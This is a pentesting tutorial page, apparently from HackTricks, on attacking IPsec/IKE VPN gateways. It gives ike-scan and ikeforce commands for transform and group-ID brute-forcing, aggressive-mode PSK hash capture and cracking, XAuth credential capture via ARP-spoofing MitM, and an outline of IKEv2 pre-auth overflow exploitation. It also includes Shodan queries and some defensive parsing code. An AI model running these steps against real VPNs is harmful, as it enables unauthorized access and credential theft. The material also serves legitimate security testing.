500/udp - Pentesting IPsec/IKE VPN
Tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
IPsec is widely recognized as the main technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone of enterprise VPN solutions.
The establishment of a security association (SA) between two points is managed by IKE, which operates under the umbrella of ISAKMP, a protocol designed for authentication and key exchange. This process takes place in several phases:
- Phase 1: A secure channel is established between the two endpoints. This is achieved with a Pre-Shared Key (PSK) or certificates, using either main mode, which involves three pairs of messages, or aggressive mode.
- Phase 1.5: Although optional, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password.
- Phase 2: This phase focuses on negotiating the parameters for protecting data with ESP and AH. It allows the use of algorithms different from those of Phase 1 in order to ensure Perfect Forward Secrecy (PFS), enhancing security.
Default port: 500/udp
Also frequently open: 4500/udp (NAT Traversal)
Discover the service using nmap
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
Finding a valid transformation
The IPsec configuration can be set up to accept only one or a few transformations. A transformation is a combination of values. Each transform contains a number of attributes such as DES or 3DES as the encryption algorithm, SHA or MD5 as the integrity algorithm, a pre-shared key as the authentication type, Diffie-Hellman 1 or 2 as the key distribution algorithm and 28800 seconds as the lifetime.
So, the first thing you have to do is find a valid transformation, so that the server will accept to talk to you. To do so, you can use the tool ike-scan. By default, ike-scan works in main mode and sends a packet to the gateway with an ISAKMP header and a single proposal containing eight transforms.
Depending on the response you can obtain some information about the endpoint:
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
As you can see in the previous response, there is a field called AUTH with the value PSK. This means the VPN is configured using a pre-shared key (and this is very good for a pentester).
The value of the last line is also very important:
- 0 returned handshake; 0 returned notify: This means the target is not an IPsec gateway.
- 1 returned handshake; 0 returned notify: This means the target is configured for IPsec and is willing to perform IKE negotiation, and one or more of the transforms you proposed are acceptable (a valid transform will be shown in the output).
- 0 returned handshake; 1 returned notify: VPN gateways respond with a notify message when none of the transforms are acceptable (though some gateways do not, in which case further analysis and a revised proposal should be tried).
So, in this case we already have a valid transformation, but if you are in the third case, you will need to brute-force a little to find a valid transformation:
First of all you need to create all the possible transformations:
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do
  for HASH in 1 2 3 4 5 6; do
    for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do
      for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do
        echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt
      done
    done
  done
done
Then brute-force each one using ike-scan (this can take several minutes):
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. Then, you could try the same brute-force but using aggressive mode:
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
Hopefully a valid transformation is echoed back.
You can try the same attack using iker.py.
You could also try to brute-force transformations with ikeforce:
./ikeforce.py <IP> # No parameters are required for a scan; use -h for additional help
In DH Group: 14 = 2048-bit MODP and 15 = 3072-bit
2 = HMAC-SHA = SHA1 (in this case). The --trans format is $Enc,$Hash,$Auth,$DH
Cisco advises against using DH groups 1 and 2 because they are not strong enough. Experts believe that countries with a lot of resources can easily break the encryption of data that uses these weak groups. This is done with a special method that prepares them to crack the codes quickly. Although it costs a lot of money to set up this method, it allows those powerful countries to read encrypted data in real time if it uses a weak group (like 1,024-bit or smaller).
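As an added example (not code from the original page or from the ike-scan project), the following Python parses ike-scan main-mode output like the one shown earlier, maps the counters of the last line to the three cases listed above, and flags the settings a defender reviewing their own gateway would want to remediate (PSK authentication, DH groups 1/2, DES/3DES). The sample text is a constructed copy of the earlier ike-scan output.

```python
import re

# Constructed sample: a copy of the ike-scan main-mode output shown earlier on this page.
SAMPLE_OUTPUT = """\
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
"""

SA_RE = re.compile(r"SA=\((.*?)\)")
END_RE = re.compile(r"(\d+) returned handshake; (\d+) returned notify")

def parse_ike_scan(text):
    """Return the accepted SA attributes plus the handshake/notify counters from the last line."""
    sa = {}
    m = SA_RE.search(text)
    if m:
        for token in m.group(1).split():
            key, _, value = token.partition("=")
            sa[key] = value
    e = END_RE.search(text)
    handshakes, notifies = (int(e.group(1)), int(e.group(2))) if e else (0, 0)
    return {"sa": sa, "handshakes": handshakes, "notifies": notifies}

def classify(handshakes, notifies):
    """Map the counters to the three cases described above."""
    if handshakes > 0:
        return "ipsec gateway, proposed transform accepted"
    if notifies > 0:
        return "ipsec gateway, none of the proposed transforms accepted"
    return "not an ipsec gateway (or silent)"

WEAK_DH = {"1", "2"}        # modp768 / modp1024: 1024-bit or smaller
WEAK_ENC = {"DES", "3DES"}  # legacy ciphers

def weak_findings(sa):
    """Flag PSK auth, small DH groups and legacy ciphers in the accepted SA."""
    findings = []
    if sa.get("Auth") == "PSK":
        findings.append("PSK authentication (aggressive-mode hash capture risk)")
    group = sa.get("Group", "").split(":")[0]   # "2:modp1024" -> "2"
    if group in WEAK_DH:
        findings.append(f"DH group {group} is 1024-bit or smaller")
    if sa.get("Enc") in WEAK_ENC:
        findings.append(f"legacy cipher {sa['Enc']}")
    return findings

if __name__ == "__main__":
    result = parse_ike_scan(SAMPLE_OUTPUT)
    print(classify(result["handshakes"], result["notifies"]))
    for finding in weak_findings(result["sa"]):
        print("WEAK:", finding)
```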
Server fingerprinting
Then, you can use ike-scan to try to discover the vendor of the device. The tool sends an initial proposal and stops replaying. Then, it analyzes the time differences between the messages received from the server and the matching response pattern; this way the pentester can successfully fingerprint the VPN gateway vendor. Moreover, some VPN servers use the optional Vendor ID (VID) payload with IKE.
Specify the valid transformation if needed (using --trans)
If ike-scan identifies the vendor, it will print:
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
This can also be achieved with the nmap script ike-version
IKEv2-specific: WatchGuard Vendor ID version fingerprinting
Some IKEv2 daemons may include non-standard Vendor ID payloads in the IKE_SA_INIT response. WatchGuard Fireware OS embeds the appliance version/build directly inside the VID, allowing single-packet, pre-auth fingerprinting.
- Transport: UDP/500 (and UDP/4500 for NAT-T)
- Packet: the IKE_SA_INIT response contains one or more Vendor ID payloads
- WatchGuard format: a 32-byte hash followed by base64 that decodes to, for example, VN=12.11.3 BN=719894
Example raw bytes from a WatchGuard VID payload (the trailing bytes after the 32-byte hash are base64):
00000000: bfc2 2e98 56ba 9936 11c1 1e48 a6d2 0807 ....V..6...H....
00000010: a95b edb3 9302 6a49 e60f ac32 7bb9 601b .[....jI...2{.`.
00000020: 566b 3439 4d54 4975 4d54 4575 4d79 4243 Vk49MTIuMTEuMyBC
00000030: 546a 3033 4d54 6b34 4f54 513d Tj03MTk4OTQ=
Quick extraction in the shell when you have the base64 tail:
echo 'Vk49MTIuMTEuMyBCTj03MTk4OTQ=' | base64 -d
# VN=12.11.3 BN=719894
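An added example (not code from this page or from WatchGuard): a Python parser for the VID layout described above that checks for the 32-byte prefix, decodes the base64 tail and returns the VN/BN fields, so an administrator can compare what their own gateway advertises against a patched baseline. The VID bytes are taken from the hexdump above; version_tuple is a helper added here.

```python
import base64
import binascii

# Constructed from the hexdump above: a 32-byte hash followed by a base64 tail.
SAMPLE_VID_HEX = (
    "bfc22e9856ba993611c11e48a6d20807"
    "a95bedb393026a49e60fac327bb9601b"
    "566b34394d5449754d5445754d794243"
    "546a30334d546b344f54513d"
)
HASH_LEN = 32  # fixed-size prefix described above

def parse_watchguard_vid(payload: bytes):
    """Split the VID into its hash prefix and decode the base64 tail into key=value fields.
    Returns None when the payload does not match the described layout."""
    if len(payload) <= HASH_LEN:
        return None
    tail = payload[HASH_LEN:]
    try:
        decoded = base64.b64decode(tail, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    fields = {}
    for token in decoded.split():
        key, sep, value = token.partition("=")
        if not sep:            # not a key=value token: not the format we expect
            return None
        fields[key] = value
    if "VN" not in fields:     # version field is what makes this a Fireware VID
        return None
    return {"hash": payload[:HASH_LEN].hex(), **fields}

def version_tuple(vn: str):
    """'12.11.3' -> (12, 11, 3), so versions can be compared against a patched baseline."""
    return tuple(int(part) for part in vn.split("."))

if __name__ == "__main__":
    info = parse_watchguard_vid(bytes.fromhex(SAMPLE_VID_HEX))
    print(info)
    print("version", version_tuple(info["VN"]))
```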
Notes
- This is not part of any IKEv2 RFC. Treat it as vendor behaviour that is useful for quickly identifying exposed/vulnerable Fireware OS versions.
- You only need to elicit an IKE_SA_INIT response; authentication is not required.
Finding the correct ID (group name)
To be allowed to capture the hash you need a valid transformation that supports Aggressive mode and the correct ID (group name). You probably won't know the correct group name, so you will have to brute-force it.
To do so, I would recommend 2 methods:
Brute-forcing the ID with ike-scan
First of all try to make a request with a fake ID in order to gather the hash ("-P"):
ike-scan -P -M -A -n fakeID <IP>
If no hash is returned, then this brute-forcing method will probably work. If some hash is returned, this means that a fake hash is going to be returned for a fake ID, so this method won't be reliable for brute-forcing the ID. For example, a fake hash could be returned (this happens in modern versions):
But as I said, if no hash is returned, then you should try to brute-force common group names using ike-scan.
This script will try to brute-force possible IDs and will return the IDs for which a valid handshake is returned (this will be a valid group name).
If you have discovered a specific transformation, add it to the ike-scan command. And if you have discovered several transformations, feel free to add a new loop to try them all (you should try them all until one of them works properly).
You can use the dictionary of ikeforce or the one in SecLists of common group names to brute-force them:
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
Brute-forcing the ID with Iker
iker.py also uses ike-scan to brute-force possible group names. It follows its own method to find a valid ID based on the output of ike-scan.
Brute-forcing the ID with ikeforce
ikeforce.py is a tool that can also be used to brute-force IDs. This tool will try to exploit different vulnerabilities that could be used to distinguish between a valid and a non-valid ID (it could have false positives and false negatives, which is why I prefer to use the ike-scan method when possible).
By default ikeforce will first send some random IDs to check the behaviour of the server and determine the tactic to use.
- The first method is to brute-force the group names by searching for the Dead Peer Detection (DPD) information of Cisco systems (this info is only replayed by the server if the group name is correct).
- The second method available is to check the number of responses sent to each try, because sometimes more packets are sent when the correct ID is used.
- The third method consists of searching for "INVALID-ID-INFORMATION" in the response to an incorrect ID.
- Finally, if the server does not reply anything to the checks, ikeforce will try to brute-force the server and check whether, when the correct ID is sent, the server replies with some packet.
Obviously, the goal of brute-forcing the ID is to get the PSK once you have a valid ID. Then, with the ID and PSK you will have to brute-force the XAUTH (if it is enabled).
If you have discovered a specific transformation, add it to the ikeforce command. And if you have discovered several transformations, feel free to add a new loop to try them all (you should try them all until one of them works properly).
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' # It is old and needs this version of the library
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
Sniffing the ID
(From the book Network Security Assessment: Know Your Network): It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear.
Capturing & cracking the hash
Finally, if you have found a valid transformation and the group name, and if aggressive mode is allowed, then you can very easily grab the crackable hash:
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> # If aggressive mode is supported and you know the ID, you can get the hash of the password
The hash will be saved inside hash.txt.
You can use psk-crack, john (using ikescan2john.py) and hashcat to crack the hash:
psk-crack -d <Wordlist_path> hash.txt
XAuth
Aggressive mode IKE combined with a Pre-Shared Key (PSK) is commonly used for group authentication purposes. This method is augmented by XAuth (Extended Authentication), which introduces an additional layer of user authentication. Such authentication typically leverages services like Microsoft Active Directory, RADIUS, or similar systems.
With the transition to IKEv2, a notable shift is observed where EAP (Extensible Authentication Protocol) is used in place of XAuth for authenticating users. This change reflects an evolution in authentication practices within secure communication protocols.
Local network MitM to capture credentials
So you can capture the login data using fiked and see if there is any default username (you need to redirect the IKE traffic to fiked for sniffing, which can be done with the help of ARP spoofing, more info). Fiked will act as a VPN endpoint and will capture the XAuth credentials:
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
Also, using IPsec try to perform a MitM attack and block all traffic to port 500; if the IPsec tunnel cannot be established, the traffic might be sent in the clear.
Brute-forcing the XAUTH username and password with ikeforce
To brute-force the XAUTH (when you know a valid group name ID and the PSK) you can use a username or a list of usernames and a list of passwords:
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
This way, ikeforce will try to connect using each combination of username:password.
If you found one or several valid transforms, just use them as in the previous steps.
Authenticating with an IPSEC VPN
In Kali, VPNC is used to establish IPsec tunnels. The profiles must be located in the /etc/vpnc/ directory. You can initiate these profiles using the vpnc command.
The following commands and configurations show the process of setting up a VPN connection with VPNC:
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
In this setup:
- Replace [VPN_GATEWAY_IP] with the actual IP address of the VPN gateway.
- Replace [VPN_CONNECTION_ID] with the identifier of the VPN connection.
- Replace [VPN_GROUP_SECRET] with the VPN group secret.
- Replace [VPN_USERNAME] and [VPN_PASSWORD] with the VPN authentication credentials.
- [PID] stands for the process ID that will be assigned when vpnc starts.
Ensure that real, secure values are used to replace the placeholders when configuring the VPN.
IKEv2 exploitation notes: pre-auth IDi/CERT processing bugs
Modern VPN appliances often expose IKEv2 on UDP/500 (and UDP/4500 for NAT-T). A common pre-auth attack surface is the parsing of the Identification (IDi) and Certificate payloads during IKE_SA_AUTH.
High-level exploitation flow when a vulnerable IKEv2 parser is present:
- Send a valid IKE_SA_INIT to negotiate transforms and complete Diffie-Hellman.
- Follow with an IKE_SA_AUTH whose IDi triggers the bug (for example, an oversized Identification copied into a fixed-size stack buffer before certificate validation).
- The resulting memory corruption can yield control of saved registers and the return address.
- With NX enabled but other mitigations missing (no PIE/canaries), build a ROP chain to call mprotect on the stack page, then pivot execution to embedded shellcode or to an interpreter present on the system (e.g. /usr/bin/python3) if /bin/sh is not available.
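The defensive counterpart of the bug class just described, as an added Python example (not any vendor's code and not from the original page): a walker over a decrypted IKEv2 payload chain that validates every declared payload length against the bytes actually received and rejects identification data larger than the receiver's buffer before anything is copied. Payload type numbers follow RFC 7296; the buffer size, the FQDN sample and the make_chain helper are constructed for the example.

```python
import struct

# IKEv2 payload type numbers (RFC 7296 section 3.2); NO_NEXT terminates the chain.
ID_I, ID_R, AUTH, NO_NEXT = 35, 36, 39, 0
ID_BUF_SIZE = 64  # hypothetical size of the receiver's fixed identification buffer

def build_payload(next_type: int, body: bytes) -> bytes:
    """Generic payload header: next payload, critical/reserved, length including the header."""
    return struct.pack("!BBH", next_type, 0, 4 + len(body)) + body

def walk_payloads(first_type: int, data: bytes):
    """Walk a (decrypted) IKEv2 payload chain. Every declared length is checked against the
    bytes actually received, and identification data is size-checked before it would be
    copied into the fixed buffer, which is the check the bug class above lacks."""
    out, ptype, off = [], first_type, 0
    while ptype != NO_NEXT:
        if len(data) - off < 4:
            raise ValueError("truncated payload header")
        next_type, _flags, plen = struct.unpack_from("!BBH", data, off)
        if plen < 4 or plen > len(data) - off:
            raise ValueError(f"payload type {ptype}: declared length {plen} does not fit")
        body = data[off + 4:off + plen]
        if ptype in (ID_I, ID_R):
            if len(body) < 4:  # ID Type (1) + RESERVED (3) precede the identification data
                raise ValueError("ID payload shorter than its fixed fields")
            if len(body) - 4 > ID_BUF_SIZE:
                raise ValueError(f"identification data of {len(body) - 4} bytes exceeds buffer")
        out.append((ptype, body))
        ptype, off = next_type, off + plen
    if off != len(data):
        raise ValueError("trailing bytes after the last payload")
    return out

def make_chain(id_data: bytes) -> bytes:
    """Constructed IDi -> AUTH chain, as it would look after SK decryption (test input only)."""
    idi_body = bytes([2, 0, 0, 0]) + id_data        # ID_FQDN, reserved, identification data
    auth_body = bytes([2, 0, 0, 0]) + b"\x11" * 20   # shared-key MIC method, reserved, dummy data
    return build_payload(AUTH, idi_body) + build_payload(NO_NEXT, auth_body)

if __name__ == "__main__":
    for sample in (b"vpn.example.test", b"A" * 200):
        try:
            print([t for t, _ in walk_payloads(ID_I, make_chain(sample))])
        except ValueError as err:
            print("rejected:", err)
```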
Example default transforms observed on some IKEv2 appliances (WatchGuard Fireware OS 12.11.3):
- SHA2-256 / AES(256-bit) with DH Group 14
- SHA1 / AES(256-bit) with DH Group 5
- SHA1 / AES(256-bit) with DH Group 2
- SHA1 / 3DES with DH Group 2
Practical notes
- Target UDP/500 and UDP/4500; NAT-T servers may answer only on 4500.
- Increase receive buffers and timeouts for UDP scanners to avoid losing packets.
- If the service exposes custom Vendor IDs (see the section above), use them to quickly fingerprint vulnerable versions before attempting any exploit traffic.
Reference Material
- PSK cracking paper
- SecurityFocus Infocus
- Scanning a VPN Implementation
- Network Security Assessment 3rd Edition
Shodan
port:500 IKE
port:4500 "UDP"
udp port:500,4500 "WatchGuard"